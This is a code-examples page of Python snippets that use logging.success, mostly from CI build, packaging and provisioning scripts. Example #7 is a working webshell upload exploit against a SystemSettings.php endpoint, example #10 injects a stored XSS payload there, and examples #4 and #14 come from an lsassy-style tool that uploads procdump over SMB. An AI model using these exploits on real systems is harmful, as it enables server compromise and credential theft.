コード例 #1
0
 def get_local_documents(self):
     logging.success("Grabbing local documents")
     self.documents = [
         os.path.join(self.working_directory, f) for f in os.listdir(self.working_directory)
         if f.split(".")[-1] in self.file_types
     ]
     return True
コード例 #2
0
def main():
    """ Main function for iterating over existing packs folder in content repo and creating json of all
    packs dependencies. The logic of pack dependency is identical to sdk find-dependencies command.

    """
    install_logging('Calculate_Packs_Dependencies.log',
                    include_process_name=True)
    option = option_handler()
    output_path = option.output_path
    id_set_path = option.id_set_path
    id_set = get_id_set(id_set_path)

    pack_dependencies_result = {}

    logging.info("Selecting packs for dependencies calculation")
    packs = select_packs_for_calculation()

    calculate_all_packs_dependencies(pack_dependencies_result, id_set, packs)

    logging.info(
        f"Number of created pack dependencies entries: {len(pack_dependencies_result.keys())}"
    )
    # finished iteration over pack folders
    logging.success("Finished dependencies calculation")

    with open(output_path, 'w') as pack_dependencies_file:
        json.dump(pack_dependencies_result, pack_dependencies_file, indent=4)

    logging.success(f"Created packs dependencies file at: {output_path}")
コード例 #3
0
def RunTranslate(translate_func: typing.Callable,
                 run_with_tracing: bool = True):
    """Run `translate_func`, and communicate success or failure back to Daisy.

  Args:
    translate_func: Closure to execute
    run_with_tracing: When enabled, the closure will be executed with
    trace.Trace, resulting in executed lines being printed to stdout.
  """
    exit_code = 0
    try:
        if run_with_tracing:
            tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix],
                                 trace=1,
                                 count=0)
            tracer.runfunc(translate_func)
        else:
            translate_func()
        logging.success('Translation finished.')
    except Exception as e:
        exit_code = 1
        logging.debug(traceback.format_exc())
        logging.error('error: %s', str(e))
    logging.shutdown()
    sys.exit(exit_code)
コード例 #4
0
 def delete(session, file_path, timeout=5):
     t = time.time()
     while True:
         try:
             session.smb_session.deleteFile("C$", file_path)
             logging.debug("File {}{} successfully deleted".format(
                 "C$", file_path))
             return True
         except BrokenPipeError:
             if time.time() - t > timeout:
                 logging.warning(
                     "File wasn't removed `{}{}`, connection lost".format(
                         "C$", file_path),
                     exc_info=True)
                 return None
             logging.debug("Trying to reconnect ...")
             if session.login():
                 logging.success(
                     "Reconnected after unexpected disconnection for proper cleanup"
                 )
         except Exception as e:
             if "STATUS_OBJECT_NAME_NOT_FOUND" in str(
                     e) or "STATUS_NO_SUCH_FILE" in str(e):
                 return True
             if time.time() - t > timeout:
                 logging.warning("File wasn't removed `{}{}`".format(
                     "C$", file_path),
                                 exc_info=True)
                 return None
             logging.debug(
                 "Unable to delete file `{}{}`. Retrying...".format(
                     "C$", file_path))
             time.sleep(0.5)
コード例 #5
0
def download_and_extract_index(build_bucket: Bucket,
                               extract_destination_path: str,
                               build_bucket_base_path: str):
    """Downloads and extracts production and build indexes zip from cloud storage.

    Args:
        build_bucket (google.cloud.storage.bucket.Bucket): google storage bucket where build index.zip is stored.
        extract_destination_path (str): the full path of extract folder.
        build_bucket_base_path (str): the path in the build bucket of the index.
    Returns:
        str: extracted build index folder full path.
        Blob: google cloud storage object that represents prod index.zip blob.
        Blob: google cloud storage object that represents build index.zip blob.
        str: downloaded prod index generation.
        str: downloaded build index generation.

    """
    build_index_storage_path = os.path.join(build_bucket_base_path,
                                            f"{GCPConfig.INDEX_NAME}.zip")
    download_build_index_path = os.path.join(extract_destination_path,
                                             f"{GCPConfig.INDEX_NAME}.zip")

    build_index_blob = build_bucket.blob(build_index_storage_path)
    build_index_folder_path = os.path.join(extract_destination_path,
                                           GCPConfig.INDEX_NAME)

    if not os.path.exists(extract_destination_path):
        os.mkdir(extract_destination_path)

    if not build_index_blob.exists():
        logging.error(
            f"No build index was found in path: {build_index_storage_path}")
        sys.exit(1)

    build_index_blob.reload()
    build_index_generation = build_index_blob.generation
    build_index_blob.download_to_filename(
        download_build_index_path, if_generation_match=build_index_generation)

    if os.path.exists(download_build_index_path):
        with ZipFile(download_build_index_path, 'r') as index_zip:
            index_zip.extractall(extract_destination_path)

        if not os.path.exists(build_index_folder_path):
            logging.error(
                f"Failed creating build {GCPConfig.INDEX_NAME} folder with extracted data."
            )
            sys.exit(1)

        os.remove(download_build_index_path)
        logging.success(
            f"Finished downloading and extracting build {GCPConfig.INDEX_NAME} file to "
            f"{extract_destination_path}")

        return build_index_folder_path, build_index_blob, build_index_generation
    else:
        logging.error(
            f"Failed to download build {GCPConfig.INDEX_NAME}.zip file from cloud storage."
        )
        sys.exit(1)
コード例 #6
0
def main():
  image = utils.GetMetadataAttribute('image', raise_on_not_found=True)
  package = utils.GetMetadataAttribute('gcs_package_path',
                                       raise_on_not_found=True)
  package_name = package.split('/')[-1]

  mount_disk = get_mount_disk(image)
  logging.info('Mount device %s at /mnt', mount_disk)
  run(f'mount {mount_disk} /mnt')

  # The rpm utility requires /dev/random to initialize GnuTLS
  logging.info('Mount dev filesystem in chroot')
  run('mount -o bind /dev /mnt/dev')

  utils.DownloadFile(package, f'/mnt/tmp/{package_name}')

  distribution = get_distro_from_image(image)
  if distribution == 'debian':
    util = 'apt-get'
  elif distribution == 'enterprise_linux':
    util = 'yum'
  else:
    logging.error('Unknown Linux distribution.')
    return

  logging.info('Installing package %s', package_name)
  run(f'chroot /mnt {util} install -y /tmp/{package_name}')

  # Best effort to unmount prior to shutdown.
  run('sync', check=False)
  run('umount /mnt/dev', check=False)
  run('umount /mnt', check=False)

  logging.success('Package %s installed successfully', package_name)
コード例 #7
0
def exploit(url: str, file: str, delay: int) -> None:
    if not os.path.exists(file):
        logging.error(f'webshell payload "{file}"" does not exist?')
        return
    logging.info(
        f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...'
    )
    uploadTime = int(time.time())
    r = requests.post(
        url + '/classes/SystemSettings.php',
        files={
            'img': (os.path.basename(file), open(file, 'rb'))
        },  # NOTE: can also use 'cover' field, but this is more inconspicuous
        params={'f': 'update_settings'},
        verify=False)
    if not r.ok:
        logging.error('HTTP upload request failed')
        return
    logging.info(
        f'finding new payload file name on target (+/- {delay} seconds) ...')
    for i in range(uploadTime - delay, uploadTime + delay + 1):
        r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}',
                         allow_redirects=False)
        logging.debug(
            f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
        # NOTE: website will send redirects for all files that do not exist
        if r.status_code != 302:
            logging.success(
                f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}'
            )
            return
    logging.error('failed to find payload on target')
    logging.warning(
        'maybe need a larger delay or uploads directory is not writable?')
    return
コード例 #8
0
    def analyse_documents(self):
        logging.success(f"Analysing {len(self.documents)} documents")
        counter = 0
        for file_path in self.documents:
            logging.success(f"[{counter + 1}/{len(self.documents)}] {file_path}")

            extractor = Extractor(file_path).load()
            if extractor is None:
                logging.debug(f"Extractor for {file_path} does not exist")
                counter += 1
                continue

            try:
                extractor.get_metadata()
                for key, values in extractor.get_results().items():
                    if key in self.results:
                        for value in values:
                            if value not in self.results[key]:
                                self.results[key].append(value)
                    else:
                        self.results[key] = values
            except Exception as e:
                logging.warning(f"Error while parsing {file_path}", exc_info=True)
                counter += 1
                continue
            counter += 1
        return len(self.documents) == 0 or self.results
コード例 #9
0
ファイル: remote.py プロジェクト: acoomans/prvsn
    def copy_package(self, ssh):
        logging.header('Sending package to ' + ssh.hostname)
        ssh.copy_to(self._package, self._package)

        for line in ssh.output:
            logging.debug(line)

        exit_code = 0

        if ssh.error:
            for line in ssh.error:
                logging.error(line)
                exit_code = 1

        if ssh.returncode is None:
            pass
        elif ssh.returncode == 0:
            logging.debug('return code: 0')
        elif ssh.returncode > 0:
            logging.error('return code: ' + str(ssh.returncode))
            exit_code = 1

        if exit_code:
            logging.error('Sending package failed.')
            sys.exit(exit_code)

        logging.success('Sent.')
コード例 #10
0
def exploit(url: str, file: str) -> None:
    if not os.path.exists(file):
        logging.error(f'{file} does not exist?')
        return
    logging.info(f'reading {file} for XSS content ...')
    with open(file, 'r') as f:
        xssPayload = f.read()
    logging.info(
        f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...'
    )
    r = requests.post(url + '/classes/SystemSettings.php',
                      data={'about_us': xssPayload},
                      params={'f': 'update_settings'},
                      verify=False)
    if not r.ok:
        logging.error('HTTP request failed')
        return
    logging.info('checking for XSS payload on main page ...')
    r = requests.get(url)
    if xssPayload not in r.text:
        logging.error(f'XSS injection failed? received: {r.text}')
        logging.warning('maybe about.html is not writable?')
        return
    logging.success('XSS payload found on target website')
    return
コード例 #11
0
ファイル: remote.py プロジェクト: acoomans/prvsn
    def execute_package(self, ssh):
        logging.header('Remotely executing package on ' + ssh.hostname)

        ssh.run_command(['python', self._package], sudo=self._sudo)

        if ssh.output:
            for line in ssh.output:
                logging.info(line)

        exit_code = 0

        if ssh.error:
            for line in ssh.error:
                logging.error(line)
                exit_code = 1

        if ssh.returncode is None:
            pass
        elif ssh.returncode == 0:
            logging.debug('return code: 0')
        elif ssh.returncode > 0:
            logging.error('return code: ' + str(ssh.returncode))
            exit_code = 1

        if exit_code:
            logging.error('Remotely executing package failed.')
            sys.exit(exit_code)

        logging.success('Remote package executed.')
コード例 #12
0
def print_packs_summary(packs_list: list):
    """Prints summary of packs uploaded to gcs.

    Args:
        packs_list (list): list of initialized packs.

    """
    successful_packs = [
        pack for pack in packs_list if pack.status == PackStatus.SUCCESS.name
    ]
    skipped_packs = [
        pack for pack in packs_list
        if pack.status == PackStatus.PACK_ALREADY_EXISTS.name
        or pack.status == PackStatus.PACK_IS_NOT_UPDATED_IN_RUNNING_BUILD.name
        or pack.status == PackStatus.FAILED_DETECTING_MODIFIED_FILES.name
    ]
    failed_packs = [
        pack for pack in packs_list
        if pack not in successful_packs and pack not in skipped_packs
    ]

    logging.info(f"""\n
------------------------------------------ Packs Upload Summary ------------------------------------------
Total number of packs: {len(packs_list)}
----------------------------------------------------------------------------------------------------------"""
                 )

    if successful_packs:
        successful_packs_table = _build_summary_table(successful_packs)
        logging.success(
            f"Number of successful uploaded packs: {len(successful_packs)}")
        logging.success(f"Uploaded packs:\n{successful_packs_table}")
        with open('pack_list.txt', 'w') as f:
            f.write(successful_packs_table.get_string())
    if skipped_packs:
        skipped_packs_table = _build_summary_table(skipped_packs)
        logging.warning(f"Number of skipped packs: {len(skipped_packs)}")
        logging.warning(f"Skipped packs:\n{skipped_packs_table}")
    if failed_packs:
        failed_packs_table = _build_summary_table(failed_packs,
                                                  include_pack_status=True)
        logging.critical(f"Number of failed packs: {len(failed_packs)}")
        logging.critical(f"Failed packs:\n{failed_packs_table}")
        sys.exit(1)

    # for external pull requests -  when there is no failed packs, add the build summary to the pull request
    branch_name = os.environ.get('CIRCLE_BRANCH')
    if branch_name and branch_name.startswith('pull/'):
        successful_packs_table = build_summary_table_md(successful_packs)

        build_num = os.environ['CIRCLE_BUILD_NUM']

        bucket_path = f'https://console.cloud.google.com/storage/browser/' \
            f'marketplace-ci-build/content/builds/{branch_name}/{build_num}'

        pr_comment = f'Number of successful uploaded packs: {len(successful_packs)}\n' \
            f'Uploaded packs:\n{successful_packs_table}\n\n' \
            f'Browse to the build bucket with this address:\n{bucket_path}'

        add_pr_comment(pr_comment)
コード例 #13
0
def upload_core_packs_config(production_bucket: Bucket, build_number: str,
                             extract_destination_path: str,
                             build_bucket: Bucket):
    """Uploads corepacks.json file configuration to bucket. Corepacks file includes core packs for server installation.

     Args:
        production_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where core packs config is uploaded.
        build_number (str): CircleCI build number.
        extract_destination_path (str): Full path of folder to extract the corepacks file
        build_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where core packs config is downloaded from.

    """
    # download the corepacks.json stored in the build bucket to temp dir
    build_corepacks_file_path = os.path.join(GCPConfig.BUILD_BASE_PATH,
                                             GCPConfig.CORE_PACK_FILE_NAME)
    build_corepacks_blob = build_bucket.blob(build_corepacks_file_path)

    if not build_corepacks_blob.exists():
        logging.critical(
            f"{GCPConfig.CORE_PACK_FILE_NAME} is missing in {build_bucket.name} bucket, exiting..."
        )
        sys.exit(1)

    temp_corepacks_file_path = os.path.join(extract_destination_path,
                                            GCPConfig.CORE_PACK_FILE_NAME)
    build_corepacks_blob.download_to_filename(temp_corepacks_file_path)
    corepacks_file = load_json(temp_corepacks_file_path)

    # change the storage paths to the prod bucket
    corepacks_list = corepacks_file.get('corePacks', [])
    try:
        corepacks_list = [
            os.path.join(GCPConfig.GCS_PUBLIC_URL, production_bucket.name,
                         GCPConfig.STORAGE_BASE_PATH,
                         LATEST_ZIP_REGEX.findall(corepack_path)[0])
            for corepack_path in corepacks_list
        ]
    except IndexError:
        corepacks_list_str = '\n'.join(corepacks_list)
        logging.exception(
            f"GCS paths in build bucket corepacks.json file are not of format: "
            f"{GCPConfig.GCS_PUBLIC_URL}/<BUCKET_NAME>/.../content/packs/...\n"
            f"List of build bucket corepacks paths:\n{corepacks_list_str}")
        sys.exit(1)

    # construct core pack data with public gcs urls
    core_packs_data = {
        'corePacks': corepacks_list,
        'buildNumber': build_number
    }

    # upload core pack json file to gcs
    prod_corepacks_file_path = os.path.join(GCPConfig.STORAGE_BASE_PATH,
                                            GCPConfig.CORE_PACK_FILE_NAME)
    prod_corepacks_blob = production_bucket.blob(prod_corepacks_file_path)
    prod_corepacks_blob.upload_from_string(
        json.dumps(core_packs_data, indent=4))

    logging.success(
        f"Finished uploading {GCPConfig.CORE_PACK_FILE_NAME} to storage.")
コード例 #14
0
ファイル: procdump.py プロジェクト: ASkyeye/lsassy
    def prepare(self, options):
        self.procdump = options.get("procdump", self.procdump)
        self.procdump_path = options.get("procdump_path", self.procdump_path)
        self.procdump_remote_share = options.get("procdump_remote_share",
                                                 self.procdump_remote_share)
        self.procdump_remote_path = options.get("procdump_remote_path",
                                                self.procdump_remote_path)

        if not self.procdump_path:
            logging.error("Missing procdump_path")
            return None

        if not os.path.exists(self.procdump_path):
            logging.error("{} does not exist.".format(self.procdump_path))
            return None

        # Upload procdump
        logging.debug('Copy {} to {}'.format(self.procdump_path,
                                             self.procdump_remote_path))
        with open(self.procdump_path, 'rb') as p:
            try:
                self._session.smb_session.putFile(
                    self.procdump_remote_share,
                    self.procdump_remote_path + self.procdump, p.read)
                logging.success("Procdump successfully uploaded")
                self.procdump_uploaded = True
                return True
            except Exception as e:
                logging.error("Procdump upload error", exc_info=True)
                return None
コード例 #15
0
def main():
    install_logging("TriggerPrivateBuild.log")
    # get github token parameter
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--github-token', help='Github token')
    args = arg_parser.parse_args()

    github_token = args.github_token

    # get branch name
    branches = tools.run_command("git branch")
    branch_name_regex = re.search(r"\* (.*)", branches)
    branch_name = branch_name_regex.group(1)

    if branch_has_private_build_infra_change(branch_name):
        # get the workflows ids before triggering the build
        pre_existing_workflow_ids = get_dispatch_workflows_ids(github_token, 'master')

        # trigger private build
        payload = {'event_type': f'Trigger private build from content/{branch_name}',
                   'client_payload': {'commit_sha1': branch_name, 'is_infra_build': 'True'}}

        res = requests.post(TRIGGER_BUILD_URL,
                            headers={'Accept': 'application/vnd.github.everest-preview+json',
                                     'Authorization': f'Bearer {github_token}'},
                            data=json.dumps(payload),
                            verify=False)

        if res.status_code != 204:
            logging.critical(f'Failed to trigger private repo build, request to '
                             f'{TRIGGER_BUILD_URL} failed with error: {str(res.content)}')
            sys.exit(1)

        workflow_ids_diff = []
        for i in range(GET_WORKFLOWS_MAX_RETRIES):
            # wait 5 seconds and get the workflow ids again
            time.sleep(5)
            workflow_ids_after_dispatch = get_dispatch_workflows_ids(github_token, 'master')

            # compare with the first workflows list to get the current id
            workflow_ids_diff = [x for x in workflow_ids_after_dispatch if x not in pre_existing_workflow_ids]
            if workflow_ids_diff:
                break

        if len(workflow_ids_diff) == 1:
            workflow_id = workflow_ids_diff[0]
            logging.success(f'Private repo build triggered successfully, workflow id: {workflow_id}\n URL:'
                            f' {WORKFLOW_HTML_URL}/{workflow_id}')

            # write the workflow id to text file to use it in get_private_build_status.py
            with open(PRIVATE_REPO_WORKFLOW_ID_FILE, "w") as f:
                f.write(str(workflow_id))
            sys.exit(0)

        else:
            logging.critical('Could not found the private repo workflow')
            sys.exit(1)

    else:
        logging.info('Build private repo skipped')
コード例 #16
0
def upload_index_to_storage(index_folder_path: str,
                            extract_destination_path: str,
                            index_blob: Any,
                            build_number: str,
                            private_packs: list,
                            current_commit_hash: str,
                            index_generation: str,
                            is_private: bool = False):
    """
    Upload updated index zip to cloud storage.

    :param index_folder_path: index folder full path.
    :param extract_destination_path: extract folder full path.
    :param index_blob: google cloud storage object that represents index.zip blob.
    :param build_number: circleCI build number, used as an index revision.
    :param private_packs: List of private packs and their price.
    :param current_commit_hash: last commit hash of head.
    :param index_generation: downloaded index generation.
    :param is_private: Indicates if upload is private.
    :returns None.

    """
    with open(os.path.join(index_folder_path, f"{GCPConfig.INDEX_NAME}.json"),
              "w+") as index_file:
        index = {
            'revision': build_number,
            'modified': datetime.utcnow().strftime(Metadata.DATE_FORMAT),
            'packs': private_packs,
            'commit': current_commit_hash
        }
        json.dump(index, index_file, indent=4)

    index_zip_name = os.path.basename(index_folder_path)
    index_zip_path = shutil.make_archive(base_name=index_folder_path,
                                         format="zip",
                                         root_dir=extract_destination_path,
                                         base_dir=index_zip_name)
    try:
        index_blob.reload()
        current_index_generation = index_blob.generation
        index_blob.cache_control = "no-cache,max-age=0"  # disabling caching for index blob

        if is_private or current_index_generation == index_generation:
            index_blob.upload_from_filename(index_zip_path)
            logging.success(
                f"Finished uploading {GCPConfig.INDEX_NAME}.zip to storage.")
        else:
            logging.critical(
                f"Failed in uploading {GCPConfig.INDEX_NAME}, mismatch in index file generation"
            )
            logging.critical(
                f"Downloaded index generation: {index_generation}")
            logging.critical(
                f"Current index generation: {current_index_generation}")
            sys.exit(0)
    except Exception:
        logging.exception(f"Failed in uploading {GCPConfig.INDEX_NAME}.")
        sys.exit(1)
    finally:
        shutil.rmtree(index_folder_path)
コード例 #17
0
def main():
    install_logging('Install_Packs.log')
    options = options_handler()

    # Get the host by the ami env
    hosts, _ = Build.get_servers(ami_env=options.ami_env)

    logging.info('Retrieving the credentials for Cortex XSOAR server')
    secret_conf_file = get_json_file(path=options.secret)
    username: str = secret_conf_file.get('username')
    password: str = secret_conf_file.get('userPassword')

    # Configure the Servers
    for host in hosts:
        server = Server(host=host, user_name=username, password=password)
        logging.info(f'Adding Marketplace configuration to {host}')
        error_msg: str = 'Failed to set marketplace configuration.'
        server.add_server_configuration(config_dict=MARKET_PLACE_CONFIGURATION, error_msg=error_msg)
        set_marketplace_url(servers=[server], branch_name=options.branch, ci_build_number=options.build_number)

        # Acquire the server's host and install all content packs (one threaded execution)
        logging.info(f'Starting to install all content packs in {host}')
        server_host: str = server.client.api_client.configuration.host
        install_all_content_packs(client=server.client, host=server_host)
        logging.success(f'Finished installing all content packs in {host}')
コード例 #18
0
def copy_id_set(production_bucket: Bucket, build_bucket: Bucket):
    """ Copies the id_set.json artifact from the build bucket to the production bucket.

    Args:
        production_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where id_set is copied to.
        build_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where id_set is copied from.
    """

    build_id_set_path = os.path.join(
        os.path.dirname(GCPConfig.BUILD_BASE_PATH), 'id_set.json')
    build_id_set_blob = build_bucket.blob(build_id_set_path)

    if not build_id_set_blob.exists():
        logging.error(
            f"id_set.json file does not exists in build bucket in path: {build_id_set_path}"
        )

    prod_id_set_path = os.path.join(
        os.path.dirname(GCPConfig.STORAGE_BASE_PATH), 'id_set.json')
    copied_blob = build_bucket.copy_blob(blob=build_id_set_blob,
                                         destination_bucket=production_bucket,
                                         new_name=prod_id_set_path)

    if not copied_blob.exists():
        logging.error(f"Failed to upload id_set.json to {prod_id_set_path}")
    else:
        logging.success("Finished uploading id_set.json to storage.")
コード例 #19
0
def install_packs(client: demisto_client,
                  host: str,
                  packs_to_install: list,
                  request_timeout: int = 999999,
                  is_nightly: bool = False):
    """ Make a packs installation request.

    Args:
        client (demisto_client): The configured client to use.
        host (str): The server URL.
        packs_to_install (list): A list of the packs to install.
        request_timeout (int): Timeout settings for the installation request.
        is_nightly (bool): Is the build nightly or not.
    """
    if is_nightly:
        install_nightly_packs(client, host, packs_to_install)
        return
    request_data = {'packs': packs_to_install, 'ignoreWarnings': True}
    logging.info(f'Installing packs on server {host}')
    packs_to_install_str = ', '.join([pack['id'] for pack in packs_to_install])
    logging.debug(
        f'Installing the following packs on server {host}:\n{packs_to_install_str}'
    )

    # make the pack installation request
    try:
        response_data, status_code, _ = demisto_client.generic_request_func(
            client,
            path='/contentpacks/marketplace/install',
            method='POST',
            body=request_data,
            accept='application/json',
            _request_timeout=request_timeout)

        if 200 <= status_code < 300:
            packs_data = [{
                'ID': pack.get('id'),
                'CurrentVersion': pack.get('currentVersion')
            } for pack in ast.literal_eval(response_data)]
            logging.success(
                f'Packs were successfully installed on server {host}')
            logging.debug(
                f'The following packs were successfully installed on server {host}:\n{packs_data}'
            )
        else:
            result_object = ast.literal_eval(response_data)
            message = result_object.get('message', '')
            raise Exception(
                f'Failed to install packs - with status code {status_code}\n{message}'
            )
    except Exception as e:
        logging.exception(
            f'The request to install packs has failed. Additional info: {str(e)}'
        )
        global SUCCESS_FLAG
        SUCCESS_FLAG = False

    finally:
        return SUCCESS_FLAG
コード例 #20
0
def RunTranslate(translate_func):
  try:
    tracer = trace.Trace(
        ignoredirs=[sys.prefix, sys.exec_prefix], trace=1, count=0)
    tracer.runfunc(translate_func)
    logging.success('Translation finished.')
  except Exception as e:
    logging.error('error: %s', str(e))
コード例 #21
0
 def output_results(self):
     for key, values in self.results.items():
         if len(values) == 0 or all("" == v.strip() for v in values):
             continue
         print("")
         logging.success(logger.highlight(key.upper()))
         for value in list(set(values)):
             logging.success(value)
コード例 #22
0
def main():
    """ Main function for iterating over existing packs folder in content repo and creating json of all
    packs dependencies. The logic of pack dependency is identical to sdk find-dependencies command.

    """
    install_logging('Calculate Packs Dependencies.log')
    option = option_handler()
    output_path = option.output_path
    id_set_path = option.id_set_path
    IGNORED_FILES.append(
        GCPConfig.BASE_PACK)  # skip dependency calculation of Base pack
    # loading id set json
    with open(id_set_path, 'r') as id_set_file:
        id_set = json.load(id_set_file)

    pack_dependencies_result = {}

    logging.info("Starting dependencies calculation")
    # starting iteration over pack folders
    for pack in os.scandir(PACKS_FULL_PATH):
        if not pack.is_dir() or pack.name in IGNORED_FILES:
            logging.warning(
                f"Skipping dependency calculation of {pack.name} pack.")
            continue  # skipping ignored packs
        logging.info(f"Calculating {pack.name} pack dependencies.")

        try:
            dependency_graph = PackDependencies.build_dependency_graph(
                pack_id=pack.name,
                id_set=id_set,
                verbose_file=VerboseFile(''),
            )
            first_level_dependencies, all_level_dependencies = parse_for_pack_metadata(
                dependency_graph, pack.name)

        except Exception:
            logging.exception(
                f"Failed calculating {pack.name} pack dependencies")
            continue

        pack_dependencies_result[pack.name] = {
            "dependencies": first_level_dependencies,
            "displayedImages": list(first_level_dependencies.keys()),
            "allLevelDependencies": all_level_dependencies,
            "path": os.path.join(PACKS_FOLDER, pack.name),
            "fullPath": pack.path
        }

    logging.info(
        f"Number of created pack dependencies entries: {len(pack_dependencies_result.keys())}"
    )
    # finished iteration over pack folders
    logging.success("Finished dependencies calculation")

    with open(output_path, 'w') as pack_dependencies_file:
        json.dump(pack_dependencies_result, pack_dependencies_file, indent=4)

    logging.success(f"Created packs dependencies file at: {output_path}")
コード例 #23
0
 def worker_done(self, worker_name, success):
     if success:
         logging.success("{} - Done rendering".format(worker_name))
     else:
         logging.error("{} - Error while rendering".format(worker_name))
     worker = self.workers.pop(worker_name, None)
     if worker:
         worker.setVisible(False)
         self.layout().removeWidget(worker)
コード例 #24
0
def test_instances(secret_conf_path, server, username, password):
    integrations = get_integrations(secret_conf_path)

    instance_ids = []
    failed_integrations = []
    integrations_counter = 0

    content_installation_client = demisto_client.configure(base_url=server,
                                                           username=username,
                                                           password=password,
                                                           verify_ssl=False)
    install_new_content(content_installation_client, server)
    for integration in integrations:
        c = demisto_client.configure(base_url=server,
                                     username=username,
                                     password=password,
                                     verify_ssl=False)
        integrations_counter += 1
        integration_name = integration.get('name')
        integration_instance_name = integration.get('instance_name', '')
        integration_params = integration.get('params')
        devops_comments = integration.get('devops_comments')
        product_description = integration.get('product_description', '')
        is_byoi = integration.get('byoi', True)
        has_integration = integration.get('has_integration', True)
        validate_test = integration.get('validate_test', True)

        if has_integration:
            instance_id, failure_message, _ = __create_integration_instance(
                server,
                username,
                password,
                integration_name,
                integration_instance_name,
                integration_params,
                is_byoi,
                validate_test=validate_test)
            if failure_message == 'No configuration':
                logging.warning(
                    f"skipping {integration_name} as it exists in content-test-conf conf.json but not in content repo"
                )
                continue
            if not instance_id:
                logging.error(
                    f'Failed to create instance of {integration_name} with message: {failure_message}'
                )
                failed_integrations.append(
                    "{} {} - devops comments: {}".format(
                        integration_name, product_description,
                        devops_comments))
            else:
                instance_ids.append(instance_id)
                logging.success(
                    f'Create integration {integration_name} succeed')
                __delete_integrations_instances(c, instance_ids)

    return failed_integrations, integrations_counter
コード例 #25
0
ファイル: remote.py プロジェクト: acoomans/prvsn
    def run(self):

        ssh = Ssh(hostname=self._hostname, username=self._username)

        self.manage_public_keys(ssh)
        self.copy_package(ssh)
        self.execute_package(ssh)

        logging.success('Remote provisioned.')
コード例 #26
0
def submit_dss_subscription(view, vertex_list, request_uuid):
    subscription_time_delta = 30
    myDSSSubscriber = dss_rid_helper.RemoteIDOperations()
    subscription_created = myDSSSubscriber.create_dss_subscription(
        vertex_list=vertex_list,
        view_port=view,
        request_uuid=request_uuid,
        subscription_time_delta=subscription_time_delta)
    logging.success("Subscription creation status: %s" %
                    subscription_created['created'])
コード例 #27
0
ファイル: upload_packs.py プロジェクト: magnetb0y/content
def print_packs_summary(successful_packs: list,
                        skipped_packs: list,
                        failed_packs: list,
                        fail_build: bool = True):
    """Prints summary of packs uploaded to gcs.

    Args:
        successful_packs (list): list of packs that were successfully uploaded.
        skipped_packs (list): list of packs that were skipped during upload.
        failed_packs (list): list of packs that were failed during upload.
        fail_build (bool): indicates whether to fail the build upon failing pack to upload or not

    """
    logging.info(f"""\n
------------------------------------------ Packs Upload Summary ------------------------------------------
Total number of packs: {len(successful_packs + skipped_packs + failed_packs)}
----------------------------------------------------------------------------------------------------------"""
                 )

    if successful_packs:
        successful_packs_table = _build_summary_table(successful_packs)
        logging.success(
            f"Number of successful uploaded packs: {len(successful_packs)}")
        logging.success(f"Uploaded packs:\n{successful_packs_table}")
        with open('pack_list.txt', 'w') as f:
            f.write(successful_packs_table.get_string())
    if skipped_packs:
        skipped_packs_table = _build_summary_table(skipped_packs,
                                                   include_pack_status=True)
        logging.warning(f"Number of skipped packs: {len(skipped_packs)}")
        logging.warning(f"Skipped packs:\n{skipped_packs_table}")
    if failed_packs:
        failed_packs_table = _build_summary_table(failed_packs,
                                                  include_pack_status=True)
        logging.critical(f"Number of failed packs: {len(failed_packs)}")
        logging.critical(f"Failed packs:\n{failed_packs_table}")
        if fail_build:
            # We don't want the bucket upload flow to fail in Prepare Content step if a pack has failed to upload.
            sys.exit(1)

    # for external pull requests -  when there is no failed packs, add the build summary to the pull request
    branch_name = os.environ.get('CIRCLE_BRANCH')
    if branch_name and branch_name.startswith('pull/'):
        successful_packs_table = build_summary_table_md(successful_packs)

        build_num = os.environ['CIRCLE_BUILD_NUM']

        bucket_path = f'https://console.cloud.google.com/storage/browser/' \
                      f'marketplace-ci-build/content/builds/{branch_name}/{build_num}'

        pr_comment = f'Number of successful uploaded packs: {len(successful_packs)}\n' \
                     f'Uploaded packs:\n{successful_packs_table}\n\n' \
                     f'Browse to the build bucket with this address:\n{bucket_path}'

        add_pr_comment(pr_comment)
コード例 #28
0
def copy_index(index_folder_path: str, build_index_blob: Blob,
               build_index_generation: str, production_bucket: Bucket,
               build_bucket: Bucket):
    """ Copies the build bucket index to the production bucket index path.

    Args:
        index_folder_path (str): index folder full path.
        build_index_blob (Blob): google cloud storage object that represents build index.zip blob.
        build_index_generation (str): downloaded build index generation.
        production_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where index is copied to.
        build_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where index is copied from.

    """
    try:
        build_index_blob.reload()
        build_current_index_generation = build_index_blob.generation

        # disabling caching for prod index blob
        prod_index_storage_path = os.path.join(GCPConfig.STORAGE_BASE_PATH,
                                               f"{GCPConfig.INDEX_NAME}.zip")
        prod_index_blob = production_bucket.blob(prod_index_storage_path)
        prod_index_blob.cache_control = "no-cache,max-age=0"

        if build_current_index_generation == build_index_generation:
            copied_index = build_bucket.copy_blob(
                blob=build_index_blob,
                destination_bucket=production_bucket,
                new_name=prod_index_storage_path)
            if copied_index.exists():
                logging.success(
                    f"Finished uploading {GCPConfig.INDEX_NAME}.zip to storage."
                )
            else:
                logging.error(
                    "Failed copying index from, build index blob does not exists."
                )
                sys.exit(1)
        else:
            logging.error(
                f"Failed in uploading {GCPConfig.INDEX_NAME}, mismatch in index file generation"
            )
            logging.error(
                f"Downloaded build index generation: {build_index_generation}")
            logging.error(
                f"Current build index generation: {build_current_index_generation}"
            )
            sys.exit(1)
    except Exception as e:
        logging.exception(
            f"Failed copying {GCPConfig.INDEX_NAME}. Additional Info: {str(e)}"
        )
        sys.exit(1)
    finally:
        shutil.rmtree(index_folder_path)
コード例 #29
0
def run_test_logic(tests_settings: Any, c: Any, failed_playbooks: list,
                   integrations: list, playbook_id: str,
                   succeed_playbooks: list, test_message: str,
                   test_options: dict, slack: Any, circle_ci: str,
                   build_number: str, server_url: str, demisto_user: str,
                   demisto_pass: str, build_name: str) -> bool:
    """
